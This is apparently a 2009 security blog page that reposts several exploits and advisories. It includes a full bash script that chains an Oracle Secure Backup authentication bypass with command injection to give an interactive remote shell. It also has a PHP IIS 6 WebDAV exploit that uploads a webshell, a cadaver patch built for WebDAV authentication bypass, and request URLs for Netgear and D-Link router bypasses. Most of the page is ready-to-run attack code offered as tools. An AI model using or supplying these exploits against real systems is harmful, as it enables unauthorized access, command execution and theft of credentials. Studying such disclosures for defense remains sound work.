Oct 06

Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit

By jason Security Tools 1 Comment »

#!/bin/bash

#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978

#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3

#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
#authentication bypass and a trivial command injection, resulting in arbitrary command execution.

#References:
#http://www.zerodayinitiative.com/advisories/ZDI-09-058/
#http://www.zerodayinitiative.com/advisories/ZDI-09-059/

#Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
#Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009

clear
echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"

if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename $0) <target IP>"
    echo "i.e.: ./$(basename $0) 192.168.0.100"
    exit
fi

if ! which curl >/dev/null
then
    echo "’curl’ is required in order to handle HTTPS connections"
    exit
fi

TARGET=$1

#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=–fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`

if [[ -z $session ]]
then
    echo "[!] Fatal error. No valid token has been retrieved"
    exit
fi

echo "[+] I got a valid token: $session"

#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`

if [[ -z $check ]]
then
    echo "[!] Fatal error. I cannot execute arbitrary commands"
    exit
fi

echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
echo
echo \>$check

while(true); do
    echo -n \>
    read -r cmd
    if [ "$cmd" == "EXIT" ]
    then
        echo "[+] Removing the temporary file and closing"
        shell="1%26del%20osb103shelltmp"
        curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
        exit
    fi
    #URLencode function
    cmd=`echo -n "$cmd"|od -t x1 -A n|tr " " %`
    shell="1%26$cmd>osb103shelltmp"
    curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
    echo "[+] Last successful command execution:"
    curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
done
#end

Tagged with:
Jun 16

Netgear DG632 Router Authentication Bypass Vulnerability

By jason Security Bulletin No Comments »

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk >
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80.
This allows an admin to login and administer the device’s settings.
Authentication of this web interface is handled by a script called
"webcm" residing in "/cgi-bin/" which redirects to the relevant pages
depending on successful user authentication. Vulnerabilities in this
interface enable an attacker to access files and data without
authentication.

II. DETAILS

The "webcm" script handles user authentication and attempts to load
"indextop.htm" (via javascript below).  The "indextop.htm" page requires
authentication (HTTP Basic Authorization).

<script language="javascript" type="text/javascript">
function loadnext() {
//document.forms[0].target.value="top";
document.forms[0].submit();
//top.location.href="../cgi-bin/webcm?nextpage=../html/indextop.htm";
}</script></head>
<body bgcolor="#ffffff" onload="loadnext()" >

Loading file …
<form method="POST" action="../cgi-bin/webcm" id="uiPostForm">
<input type="hidden" name="nextpage" value="../html/indextop.htm" id="uiGetNext">
</form>

If a valid password to the default "admin" user is supplied, the script
then continues to load the "indextop.htm" page and continues to load the
other frames based on a hidden field.  If user authentication is
unsuccessful, the user is returned back to "../cgi-bin/webcm".  It is
possible to bypass the "webcm" script and access specific files directly
without the need for authentication.

Normal use:
http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm

This would ask for the user to authenticate and would refuse access to
this file if authentication details were not known.  All the script is
doing is making sure authentication is forced upon the user.  The same
"stattbl.htm" file can be accessed without having to provide any
authentication using the following URL:

http://TARGET_IP/html/stattbl.htm

Another example:
http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm
(returns 401 – Forbidden)

Bypassing the "webcm" script:
http://192.168.0.1/html/modemmenu.htm
(returns 200 – OK)

In the example above (modemmenu.htm), the full source can be viewed
which discloses further directories and files within the javascript of
the page. A sample of files disclosed within modemmenu.htm and available
to download are:

/html/onload.htm
/html/form.css
/gateway/commands/saveconfig.html
/html/utility.js (full source)

There are many other files that are accessible by calling them directly
instead of going via the "webcm" script, the above are just a sample. In
addition, it is possible to specify paths to the "webcm" script as shown
below:

http://TARGET_IP/cgi-bin/webcm?nextpage=../../

This allows an attacker to enumerate what files and directories exist
within the www root directory and beyond by using 200, 403 and 404
errors as a guide.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE

12 June, 2009 – Contacted vendor.
15 June, 2009 – Vendor responded.  Stated the DG632 is an end of life
product and is no longer supported in a production and development
sense, as such, there will be no further firmware releases to resolve
this issue.

IV. CREDIT

Discovered by Tom Neaves

Tagged with:
May 26

PHP <= 5.2.9 Local Safemod Bypass Exploit

By jason Security Bulletin 1 Comment »

Title  : PHP <= 5.2.9 SafeMod Bypass Vulnerability (win32)
Affected Version : Tested on 5.2.8, 5.2.6 but previous versions maybe be afftect
Vendor  Site   : www.php.net

Vulnerability Discoverd by   : www.abysssec.com

Description :

Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
the problem comes from OS behavior – implement  and interfacing between php
and operation systems directory structure . the problem is php won’t tell difference
between directory browsing in linux and windows this can lead attacker to ability
execute his / her commands on targert machie even in SafeMod On  (php.ini setting) .

Vulnerability :

in linux when you want open a directory for example php directory you need
to go to /usr/bin/php and you can’t use \usr\bin\php . but windows won’t tell
diffence between slash and back slash it means there is no didffrence  between
c:\php and c:/php , and this is not vulnerability but itself but  because of this  simple
php implement "\" character can escape safemode using  function like excec .

PoC / Exploit :

orginal : www.abysssec.com/safemod-windows.zip
mirror  : www.milw0rm.com/sploits/2009-safemod-windows.zip

note : this vulnerabities is just for educational purpose and showing vulnerability exist
so author will be not be responsible for any damage using this vulnerabilty.

for more information visit Abysssec.com
feel free to contact me at admin [at] abysssec.com

Tagged with:
May 22

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)

By jason Security Bulletin No Comments »

<?

print_r(‘
********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********
                                                        
       Usage: php ‘.$argv[0].’ source/path/put host path   
       Example: php ‘.$argv[0].’ source www.tian6.com /blog/readme.asp       
       Example2: php ‘.$argv[0].’ path www.tian6.com /secret/
       Example3: php ‘.$argv[0].’ put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
‘);

//verification du debut
if($argv[1]!=”source”&&$argv[1]!=”path”&&$argv[1]!=”put”){echo “Choose a action,source or path or put.”;die;}
else {$action=$argv[1];}

if(stristr($argv[2],”http://”)){echo “No http:// in the host!”;die;}
else{$host=$argv[2];}

if(stristr($argv[3],”/”)==false){echo “Where is the / ?”;die;}
else{$path=$argv[3];}
//sent
function sent($sock)  
{  
global  $host, $html;  
$ock=fsockopen(gethostbyname($host),’80′);  
if (!$ock) {  
echo ‘No response from ‘.$host; die;  
}  
fputs($ock,$sock);  
$html=”;  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
fclose($ock);  
}  

if($action==”source”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af/”,$position,1);
 $sock=”GET “.$path.” HTTP/1.1\r\n”;
    $sock.=”Translate: f\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n\r\n”;
 sent($sock);
 echo $html;
 die;
 }
if($action==”path”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
 $sock=”PROPFIND  “.$path.” HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Content-Length: 0\r\n\r\n”;
    $sock.=’<?xml version=”1.0″ encoding=”utf-8″?><D:propfind xmlns:D=”DAV:”><D:prop xmlns:R=”http://www.foo.bar/boxschema/”><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>’;
    sent($sock);
 $bur=explode(“<a:href>”,$html);
    foreach($bur as $line){$no=strpos($line,”<”);$resultat.=substr($line,0,$no).”\n”;}
    echo $resultat;
 die;
    }
if($action==”put”){
 echo “Remember,keep urfile in type txt!\r\n\r\n”;
     $fp = fopen(“test.txt”, ‘r’);
  if($fp!=false){
     while (false!==($char = fgets($fp))) {
     $fir1=$char;
     }
     fclose($fp);
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
    $sock=”PUT “.$path.”test.txt HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Connection:close\r\n”;
 $sock.=”Content-Length: “.strlen($fir1).”\r\n\r\n”;
    $sock.=”".$fir1.”\r\n”;
    echo $sock; sent($sock);sleep(2);
 $sock=”MOVE “.$path.”test.txt HTTP/1.1\r\n”;
    $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=”Destination: “.$path.”racle.asp\n\n”;
    sent($sock);
 echo “Be cool,man! Webshell is http://”.$host.$path.”racle.asp“;
 die;}
 else{die;}
 }

Tagged with:
May 21

Microsoft IIS6 WebDAV Remote Authentication Bypass Exploit (patch)

By jason Security Bulletin No Comments »

Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# –snip–
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# –snip–
# > tar xzvf cadaver-0.23.2.tar.gz
# –snip–
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# –snip–
# > make
# –snip–
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/’: succeeded.
#        password.txt                           7  May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt’:
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
— cadaver-0.23.2/lib/neon/ne_basic.c    2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c    2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
     value = "infinity";
     break;
     }
-    ne_add_request_header(req, "Depth", value);
+    ne_add_request_header(req, "Depth", "1");
}
static int copy_or_move(ne_session *sess, int is_move, int overwrite,
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
— cadaver-0.23.2/lib/neon/ne_request.c    2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c    2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
                            "Connection: TE" EOL
                            "TE: trailers" EOL);
     }
+    ne_buffer_czappend(req->headers, "Translate: f" EOL);
}
int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
                   const char *method, const char *path)
{
+    char *path2 = ne_calloc(strlen(path)+7);
     ne_request *req = ne_calloc(sizeof *req);
     req->session = sess;
@@ -435,13 +437,18 @@
     req->method = ne_strdup(method);
     req->method_is_head = (strcmp(method, "HEAD") == 0);
+    if(strlen(path)>2)
+        sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+    else
+        path2 = path;
+
     /* Only use an absoluteURI here when absolutely necessary: some
      * servers can’t parse them. */
-    if (req->session->use_proxy && !req->session->use_ssl && path[0] == ‘/’)
+    if (req->session->use_proxy && !req->session->use_ssl && path2[0] == ‘/’)
     req->uri = ne_concat(req->session->scheme, "://",
-                 req->session->server.hostport, path, NULL);
+                 req->session->server.hostport, path2, NULL);
     else
-    req->uri = ne_strdup(path);
+    req->uri = ne_strdup(path2);
     {
     struct hook *hk;
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
— cadaver-0.23.2/lib/neon/ne_uri.c    2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c    2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX    x0      x2      x4      x6      x8      xA      xC      xE     */
/*   0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/*   1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/*   2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/*   2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/*   3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/*   4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/*   5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,

Tagged with:
May 17

D-Link Captcha Bypass

By jason Security Bulletin No Comments »

D-Link released new firmware designed to protect against malware that
alters DNS settings by logging in to the router using default administrative
credentials. There is a flaw in the captcha authentication system that allows
an attacker to glean your WiFi WPA pass phrase from the router with only user-level
access, and without properly solving the captcha.

When you login with the captcha enabled, the request looks like this:

GET /post_login.xmlhash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52
F&auth_id=268D2

The hash is a salted MD5 hash of your password, the auth_code is the captcha value that
you entered, and the auth_id is unique to the captcha image that you viewed
(this presumably allows the router to check the auth_code against the proper captcha image).
The problem is that if you leave off the auth_code and auth_id values, some pages in the
D-Link Web interface think that you’ve properly authenticated, as long as you get
the hash right:

    GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a

Most notably, once you’ve made the request to post_login.xml, you can activate WPS with the following request:

    GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0

When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and
retrieve the WPA passphrase directly from the router.

More info on WPS et al. at http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/

Tagged with:
preload preload preload